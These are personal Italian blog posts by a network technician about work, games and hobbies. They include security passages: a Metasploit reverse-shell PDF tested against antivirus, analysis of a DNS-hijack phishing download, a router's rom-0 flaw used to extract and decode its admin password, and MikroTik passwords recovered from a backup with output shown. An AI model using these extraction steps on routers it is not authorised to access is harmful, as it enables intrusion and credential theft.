stamattina sono stato al Conservatorio, a sostituire il loro firewall con un nostro apparato.
mi ricordo che mi ero fatto dare l’accesso al loro fw e avevo preso nota di tutte le regole, per poi replicarle sul nostro apparato, e avevo notato una cosa simpatica, del tipo:

regola n.1 “consenti traffico da lan interna a sito XXX.YYY”
regola n.2 “consenti traffico da lan interna verso tutti i siti”

ma… allora?!?

visto che chi mi doveva accogliere non c’era, ho profittato del tempo a disposizione per andare nell’altro edifico a far ripartire due apparati che si erano “impallati” come si suole dire.

uno era un normale totem per la navigazione dei musicanti.
l’altro era un access point, situato in un non meglio precisato punto nel “controsoffitto” del primo piano.

dopo aver reboottato il totem, ho fatto le scale e sono arrivato al primo piano.
uno si trova davanti una cosa del genere:

e comprensibilmente si chiede: e mo’ quale cazzo è il pannello da sollevare?
sarà quello mezzo sfondato?
segue telefonata a Socio 1. dalle indicazioni che mi fornisce ho la fortissima sensazione che confonda la destra con la sinistra.
tentativo successivo: collega1. mi parla del “pannello in alto sopra il totem arancione”, mentre io ho davanti agli occhi un imponente totem verde.

non ho voglia di seguire il metodo della serva (alzo tutti i pannelli dal primo all’ultimo), ci dovrà essere una logica per trovare il pannello giusto.
magari quello che lascia intravedere un cavo che si imbuca nel controsoffitto?
no, perché avvicinandomi, è un cavo telefonico, non di rete.

….ma poi.. ho visto la luce 🙂

sia santificato Emi che ha avuto l’accortezza di fare quel segno 🙂

p.s. da oggi ho gli occhiali nuovi

No comments

ieri ho finito Watch_Dogs… mi mancherà 🙂
ha dato ampio sfogo a tutte le mie più libidinose fantasie sull’argomento..
uno dei più bei giochi di sempre *

e soprattutto.. sono stato capace di finirlo usando un tappetino per il mouse molto particolare:

No comments

in questo periodo mi sento parecchio distaccato dall’informatica.. in generale sono molto stanco

non ho voglia di fare le solite cose. e soprattutto.. mi sento le braccia e i polsi veramente doloranti. devo fare qualcosa.

..stranamente però mi sento più produttivo..

ho l’approccio: “ok che ci sta da risolvere oggi?” e inizio a fare..

forse prima il tutto mi piaceva TROPPO, ma questo mi portava a divagare e a perdermi tra mille pensieri/fantasticherie..

 

cmq, resta vero un fatto: leggere la documentazione non ha mai fatto male a nessuno

 

IPv4

One or more /24 type zones need to be created if your address space has a prefix length between /17 and /24. If your prefix length is between /16 and /9 you will have to request one or more delegations for /16 type zones. If you have an address block with a prefix of /25 or larger you will have to revert to Classless Delegations

For example, if you have been assigned 10.155.16/21. you need to create eight reverse zones 16.155.10.in-addr.arpa, 17.155.10.in-addr.arpa, 18.155.10.in-addr.arpa, 19.155.10.in-addr.arpa, 20.155.10.in-addr.arpa, 21.155.10.in-addr.arpa, 22.155.10.in-addr.arpa and 23.155.10.in-addr.arpa.

 

No comments

anche se nel film “into the wild” si dice, alla fine, che non è possibile essere felici se non si condivide la felicità con qualcuno (cosa che a me sembra assolutamente vera), poco fa sono state felice, da solo

ho messo sotto test un hard disk da 1 TB che mi ritrovo in giro per casa non so nemmeno come
se funziona bene, allora è la volta buona che mettiamo un NAS a casa (con lopoc lo diciamo da un po’..)

ma.. ci vogliono quasi 3 ore! e io sono ansioso di sapere se ‘sto disco è buono.

ecco dunque la ricetta della felicità di oggi pomeriggio:

ogni tanto, se vi va, date una controllatina a questo link 🙂

No comments

effettivamente spesso uso Windows.
non me ne frega più molto di nessuna questione “filosofica” legata alle licenze.

tanto, qualsiasi distro uno scelga, che fai poi, non lo installa adobe flash player? E ALLORA!?
non installa tutti i codec possibili e immaginabili per vedere i dvd? E ALLORA!?
usa o non usa con grande soddisfazione qualsiasi driver proprietario, se questo fa funzionare meglio la scheda grafica, rende possibile l’utilizzo della propria esotica webcam, etc..? E ALLORA!?

altrimenti, che vuoi fare? la verità è che se uno volesse fare il “dritto”, dovrebbe leggere qui e usare una di queste distro strane e sconosciute:

http://www.gnu.org/distros/free-distros.it.html (tra cui la fantastica dyne:bolic made in Pescara :))

e magari se gli viene qualche dubbio “ma come!? e Debian ? Slackware? ” leggere qui:

http://www.gnu.org/distros/common-distros.it.html

..giusto per avere un’idea della “talebanezza” che viene richiesta agli adepti.

(come in genere ho sempre usato fieramente Debian, e pare che sia indubbiamente la “meno peggio” tra la lista)

bene, ma perché tutto questo discorso?
beh perché Windows è comunque un colabrodo, e ogni tanto mi domando se effettivamente sono “al sicuro” o se sono piuttosto del tutto ignaro del fatto che magari ci sono persone che pascolano sul mio pc da mesi senza che io ne sia consapevole (cosa che, tra l’altro, è successa realmente ad un amico che forse è anche più scrupoloso di me in materia).

e quando ti succede in certi ambiti, si innesca una serie di paranoie che ti fanno tremare i polsi.

insomma.. qualche antivirus usare?
come decidere se è un antivirus è buono o no?

come MISURARE tutto questo?

perché col cazzo che io mi affido a dichiarazioni shock di gente che ogni tanto frequento (es. “usa la versione a 64bit della distro XXX, anche se hai 1 GB di RAM, vedrai che andrà più VELOCE”)
ma se qualsiasi binario, compilato a 64bit, viene comunque più “ciccione” dell’equivalente a 32bit, perché dovrei farlo se comunque a prescindere consuma più memoria?

perché uno si deve affidare a queste cazzate fondate su sensazioni piuttosto che sulla SCIENZA (grazie N.)?

bene.
io in genere metto Panda.
l’interfaccia mi sembra leggera e semplice da usare.
direi che mi ha tanato diverse cose, e non mi sono mai ritrovato col pc impestato dal Male.

ma c’è un problema.

ho passato uno dei ferragosti più belli della mia vita. 24 ore a casa.

con la febbre.

coi telefoni spenti.

per dedicarmi a una cosa a cui volevo dedicarmi da tempo: metasploit.

erano anni che non provavo una tale entusiasmo e serenità nel non avere nessun’altra cosa a cui pensare, se non a quello che mi piaceva, in quel momento.
quelle volte quando ti dispiace, ma devi per forza andare a dormire perché non ti si tengono gli occhi aperti.

cmq, a un certo punto mi sono trovato qui:

http://www.offensive-security.com/metasploit-unleashed/Client_Side_Exploits

e ho creato il mio bel file PDF “finto”, che quando ci clicchi ti apre una bella reverse shell verso un ip che vuoi tu.

l’ho provato a scansionare con Panda: non ho trovato un cazzo.

allora ho pensato: vediamo che dice www.virustotal.com, vediamo insomma se è solo Panda a fare cilecca, o ci sono altri AV che ti stanano una cosa così nefasta come una reverse shell.

ecco il risultato:

e il nostro Panda??

ovviamente è nella lista dei “per noi è tutto apposto! vai!!”

Questa è Scienza.

Che palle però, mi tocca cambiare antivirus 🙂

No comments

ogni tanto mi metto a fantasticare sul fatto che se qualcosa dovesse costringermi a casa, per un lungo periodo, non sarei poi così disperato.

probabilmente ( a parte che non mi dispiace stare a casa ), mi imbarcherei in qualche mega missione catalogatrice ( fosse anche all’interno dei file sul mio pc, anzi i miei, purtroppo..)

sto finendo di rileggere questo libro: “Architettura dell’informazione” di Luca Rosati (Apogeo).

vorrei ricordare qui alcuni tratti..

 

“[Vorrei che] ogni applicazione, ogni prodotto digitale avesse un web browser, senza perdere in funzionalità o velocità. Vorrei cioè “ultimate connectivity”, la massima connettività, in qualsiasi cosa io faccia. Non voglio avere una cesura, anche solo percepita, tra i dati in mio posseso e quelli che ho archiviato sul Web. E poi debbo poter operare in maniera ininterrotta e continua, attraverso apparecchi che siano davvero “amichevoli” non invadenti. Niente deve distoglierci dal flusso creativo o lavorativo in cui stiamo operando: la nostra attenzione deve essere rivolta sull’azione da compiere, non sullo strumento. Questa è l’etica insita nella user experience e io l’ho imparata quando entravo e uscivo, a mio piacere, dal flusso della musica rock” (Pabini Gabriel-Petit)

Questo mi ha colpito. In generale mi sono davvero rotto i coglioni di porre eccessiva attenzione al “mezzo”, soprattutto per presunte questioni di sicurezza e privacy.

Sono tutti pensieri che assorbono energia, sforzi. E poi ti resta meno cervello per pensare al resto. Che poi, questo “resto” sarebbe “il nuovo”, quello ancora da scoprire, non quello che conosco già.

E’ anche per questo motivo che… dopo mesi (se non anni), sono tornato a Chrome.

Mi ha sempre dato fastidio l’idea di fare ricerche su Google MENTRE si è loggati sul browser col proprio account Gmail.

Vabe’, in fin dei conti si può sempre abilitare la navigazione in “incognito”, se mai possa veramente servire a qualcosa.

Peccato però, ero piuttosto contento di usare Firefox con un MIO SERVER per sincronizzare bookmarks e password.

Non ho capito bene, ma mi pare che con la nuova versione di FF non si possa fare più.

Ma a parte tutto, come mi ha fatto riflettere anche il buon ftp21, Chrome è l’unico su cui la sincronizzazione dei bookmarks funziona VERAMENTE (senza stupidi doppioni, cosa che con FF succede), e poi ha un lettore pdf INTEGRATO.

E poi , come invece dice il buon rage, Chrome è probabilmente il browser più “auditato” , quindi più sicuro.

La questione è: salvarci le password oppure no?

Ho fatto una specie di sondaggio tra tutti i miei amici hackers: quasi tutti non le salvano,  e uno in particolare non usa nemmeno un gestore di password (va a memoria).

io al momento.. le sto salvando nel  browser ma non le sincronizzo tra i vari browser. e uso un gestore di password.

andiamo avanti.

PREFAZIONE:

Interessante è rendersi conto che , per mettere ordine, è necessario porre in discussione la nostra idea dell’ordine, concedersi il lusso dell’incoerenza , per arrivare a nuove forme di coerenza , più utili al nostro scopo. […]. Non fatevi prendere dal panico: è tutto molto più logico e intuitivo di come sembra a prima vista. L’abbiamo sempre saputo, solo che non sapevamo di saperlo. Luca Rosati ci racconta della categorizzazione, cioè di quel processo, basilare nell’ordinare cose o concetti, che ci consente di aggregare gli oggetti in gruppi sensati, per poi ritrovarli (o per consentire ad altri di farlo) con facilità, usando logiche intuitive”

La parte tra parentesi “(o per consentire ad altri di farlo)” l’ho sottolineata, perché rispecchia alcune mie intense elucubrazioni mentali quando sono a lavoro e metto mano, per esempio, alla documentazione interna.

Ma non solo: in realtà spesso organizzo file e cartelle sulla MIA postazione con la stessa logica (quella altruista): forse penso che la maniera più logica di ritrovare cose per un’altra persona sia anche quella più logica per me.  O magari ho paura di non ricordare più 🙂

POST SCRIPTUM: lo zoo di stoffa

Gaia ha sette anni e una certa propensione agli animali di peluche. [..] Le chiedo di spiegarmi come mai io veda sempre questi dodici, tredici animalie sempre rigorosamente  a gruppi,  ma mai tutti insieme, e lei mi fornisce questa spiegazione, disponendomeli davanti per mia educazione: alcuni di questi sono amici, quindi stanno sempre insieme.

Sono una foca, un asino e un elefante. La foca è anche l’animale alfa, il suo Hobbes personale, per così dire. I due cani stanno da soli, perché predano gli altri. Nell’ultima settimana li abbiamo dovuti sedare più volte mentre preparavano un barbecue per arrostire qualche altro peluce. Il coniglio è amico del gruppo foca-elefante-asino, ma viene dallo stesso posto della pecora (la fattoria? Gaia non dice); pertanto, si colloca in mezzo tra questi, ma solo quando i cani non cercano di mangiarlo, se no si nasconde nella sua tana.

La puzzola e il pinguino sono quasi sempre insieme perché sono dello stesso colore; poi il pinguino sta insegnando alla puzzola a nuotare. Le altre due foche piccole, ma veramente piccole, stanno sempre insieme perché sono della stessa taglia. Il secondo elefante e l’ornitorico hanno la stessa età e giocano insieme , ma in realtà sia l’ornitorinco che il pinguino hanno il becco, quindi il primo fa in realtà anche gruppo col secondo, ma, attenzione, non il secondo elefante. Lui non c’è se l’ornitorinco sta da solo”

 

 

 

 

No comments

come si fa a non abilitare quell’opzione?
a volte delle caratteristiche puramente estetiche ti fanno venire voglia di fare cose.  a me è sempre piaciuto molto vedere l’albero dei ports di FreeBSD:

 

 

tutta questa roba dentro “biology” ti fa venire voglia di installarla solo per vedere com’è 🙂

No comments

R1#sh ip eigrp neighbors
IP-EIGRP neighbors for process 1
H Address Interface Hold Uptime SRTT RTO Q Seq
(sec) (ms) Cnt Num
0 10.1.13.2 Se0/0/1 14 00:00:05 40 1000 0 12
1 10.1.12.2 Se0/0/0 12 00:00:03 40 1000 0 14

R1#

nel dubbio, sto facendo qualcosa di tecnico per me. ciò che io chiamo fase di “sviluppo e ricerca”

No comments

qualche giorno fa mi sono spinto un po’ oltre

un pizzico di coraggio in più

ho superato quella barriera… ma puoi l’abbaiare di un cane mi ha spinto a tornare indietro

però mi sono cmq emozionato

 

allora mi sono voluto informare, e ho chiesto a qualcuno, qualcuno che ne sapesse di cani, per esempio pierpi, come funzionassero i cani

e lui mi ha detto: se il cane abbaia, vuol dire che non ti morde sicuro

vuole dirti semplicemente  “non avvicinarti”

e poi ho pensato.. in effetti io sentivo questo abbaiare.. ma che restava sempre lontano, non è che mi veniva incontro

quindi ho dedotto che presumibilmente questo cane era chiuso in quale recinto, e non potevo uscirne

cmq.

 

oggi … serata smanettona a livelli pregiatissimi

io, rage, ftp e lopoc

io avevo fatto la spesa ma evidentemente rage non voleva perdere molto tempo tra cucina etc.. così ha proposto di andare al macdonald

ma appena siamo entrati.. c’era una sterminata fila di adolescenti

e abbiamo ripiegato su pizza dal Ciocco

poi è arrivato anche valerio

sul monitor di rage ho visto cose turche. ero ovviamente anche piuttosto frustrato per non capire bene tutto..

è un mondo, quello degli exploit, affascinante.. penso che sia una cosa assolutamente ideale per chi vuole.. distrarsi dal “vivere”

a un certo punto i miei illustri ospiti si sono lamentati perché la banda faceva pena

allora ho disabilitato la wlan2 che dà connessione ai “vicini”…

fanculo alla vicina di sopra, fanculo alla vicina di sotto, e fanculo pure a tutti i loro amici che scroccano la rete wifi per giocare a burraco online (ehi ma come faccio a saperlo?)

che parole mi ricordo?

epilog <– bella

“allineare i pianeti”

poi siamo stati a designeria.. e.. mi sono aperto, bevendo solo mezzo neuromante

a un certo punto mi sono iniziato a chiedere..e mo chi riporta la macchina? io o lopoc?

nel mentre lo pensavo, lui è tornato con un SECONDO neuromante.. come cazzo fa..

 

allora gli ho chiesto se mi accompagnava in un posto

e lui c’è venuto

stavolta pare che il cane non ci fosse

poi.. ho iniziato a .. sentirmi un po’ inquieto

laddove a me è bastato restare lì, sotto alla torre, e fare una foto, lui ha scavalcato la recinzione

dio ha voluto che le porte per salire SOPRA fossero chiuse a chiave, sennò kullù sarebbe salito sopra. matematico

cmq era pieno di telecamere.

chissà se domani ci arrestano

 

domani sarò uno zombie. totale

 

 

 

No comments

questa mattina è venuto fuori che E. non riusciva ad entrare su uno dei nostri Mikrotik

o meglio, ci entrava, ma non sapeva qual’era la password (eh beh, può succedere anche questo).

è chiaro che uno, una volta dentro, ricambia la password e “buonanotte al secchio” (…)

ma… in generale… c’è un modo per trovare una password già salvata sul Dude? 🙂

 

se si esporta la configurazione:

/export file name=cazzo.rsc

gli utenti non vengono salvati, tantomeno le credenziali

ma ci tenevo a rispondere alla domanda di E.

da quel momento, quindi, risolvere questa cosa è diventato il chiodo fisso della mia giornata.

 

pare che esportando piuttosto il backup

/system backup save name=minchia.backup

si possa fare qualcosa.

avevo visto questo sito, e mi sembrava carino:

https://aacable.wordpress.com/tag/mikrotik-password-recovery/

ciononostante, non volevo compilare nulla di questa roba su uno dei nostri server in produzione (estrema paranoia… che chissà se mai un giorno mai mi ripagherà).

mi ero promesso dunque di farlo a casa, in pausa pranzo, sul mio pc

ma a pranzo non ho pranzato a casa, quindi l’unico momento per farlo sarebbe stato la sera, nella sede del LUG.

 

è bello andare in un posto e avere qualcosa di specifico da fare .

mi sono seduto. mi sono agganciato con l’eeepc alla rete wifi della sede (dove c’è un router non gestito da noi) e ho aperto google, per ritrovare l’howto di cui sopra.

mi sono trovato davanti questo:

 

 

 

 

 

 

 

onestamente è tutto molto ben fatto. gran parte dell’umanità cliccherebbe senza indugiare.

se lo si fa, si scarica un bel file setup.exe, proprio come questo: setup.exe (magari non farlo…)

la prima cosa che stuzzica la curiosità dello smanettone, è quantomeno usarci sopra strings:

 

sugo@crunchspo:~$ strings downloads/setup.exe  |less
 ..

..

SQLGetInstalledDrivers
 odbccp32.dll
 VerQueryValueA
 GetFileVersionInfoA
 GetFileVersionInfoSizeA
 version.dll
 %s\odbccp32.bad
 %s\%s
 The program %s, or one of its DLLs attempted to call the function %s which is not supported in the loaded ODBC installer DLL (%s).  Press OK to proceed.
 The ODBC installer DLL (ODBCCP32.DLL) is not installed on this system.
 ODBC Installer Error
 ..

..

SELECT
 FROM demo_table ORDER BY
 ODBC;DRIVER={%s};DSN='';DBQ=%s
 No Excel ODBC driver found
 ReadExcel.xls
 ..

..

w w w. m eit u.c o m     <-- sito giapponese che vende cellulari

tra l’altro, lorenzo mi ha  fatto conoscere questo sito dove puoi uploadare merda e vedere come si sarebbero comportarti i più diffusi antivirus:

https://www.virustotal.com/   (qui ci puoi andare 🙂 )

molto carino, ma come ho fatto ad essere reindirizzatosul finto sito Google? sicuramente tramite DNS.

ma che DNS sto usando ora, qui?

 

sugo@crunchspo:~$ cat /etc/resolv.conf
 # Generated by NetworkManager
 nameserver 23.253.94.129

e che è 23.253.94.129 ??

 

NetRange:       23.253.0.0 - 23.253.255.255
 CIDR:           23.253.0.0/16
 OriginAS:       AS19994
 NetName:        RACKS-8-NET-15
 NetHandle:      NET-23-253-0-0-1
 Parent:         NET-23-0-0-0-0
 NetType:        Direct Allocation
 RegDate:        2013-11-08
 Updated:        2013-11-08
 Ref:            http://whois.arin.net/rest/net/NET-23-253-0-0-1

OrgName:        Rackspace Hosting

ho capito subito che qualcuno, finalmente, era entrato su quel cazzo di router non-nostro (admin/admin) e aveva fatto il lavoro.

oltretutto avevano anche cambiato la password al router, per cui non potevo nemmeno rientrarci.

ma, come mi ha suggerito valerio 🙂 ,  si poteva tranquillamente sfruttare  la stessa falla che avevano usato gli amici connessi dallo spazio profondo 🙂

quale falla? semplicemente:

http://192.168.1.1/rom-0

 

e ti scarichi il tutto, compresa la password, che però va un attimo conquistata.

ho seguito questo sito, scoprendo di essere veramente lamer nell’utilizzo di git  😀

https://www.3noled.in.th/decrypt-rom-0-file

 

e così, finalmente:

 

root@crunchspo:~# ./decompress /home/sugo/downloads/rom-0

root@crunchspo:~# strings /home/sugo/downloads/rom-0.decomp
 263297  <-- password in chiaro
 public
 public
 public
 2`Node1
 Node2
 Node3
 Node4
 Node5
 Node6
 Node7
 dhcppc
 +       *
 RT2561_1
 default
 vlan15
 P/tr069
 trendchip
 TC3162
 DSL-Gateway
 Trendchip Product
 0017A5

..così “ho acceduto” al router, ho avuto conferma che:

 

 

 

 

 

 

 

e ho poi ricambiato la password (e impedito l’accesso dall’esterno 🙂

 

e dopo?

 

dopo mi sono potuto dedicare al problema di questa mattina, la password di Emi 🙂

ho usato il tool preso da questo sito:

http://manio.skyboo.net/mikrotik/

 

e..

 

root@crunchspo:/usr/local/src/mtpass-0.9# ./mtpass /home/sugo/downloads/sugo.backup
mtpass v0.9 - MikroTik RouterOS password recovery tool, (c) 2008-2012 by manio
http://manio.skyboo.net/mikrotik/

Reading file /home/sugo/downloads/sugo.backup, 32703 bytes long

Rec# | Username        | Password           | Disable flag   | User comment
--------------------------------------------------------------------------------------------
1    | admin           | <BLANK PASSWORD>   |                |
2    | admin           | Passw-Tadaaaa      |                |
3    | default         | <BLANK PASSWORD>   |                |
4    | default         | <BLANK PASSWORD>   |

 

è stata una serata produttiva 😉

 

 

 

 

 

 

No comments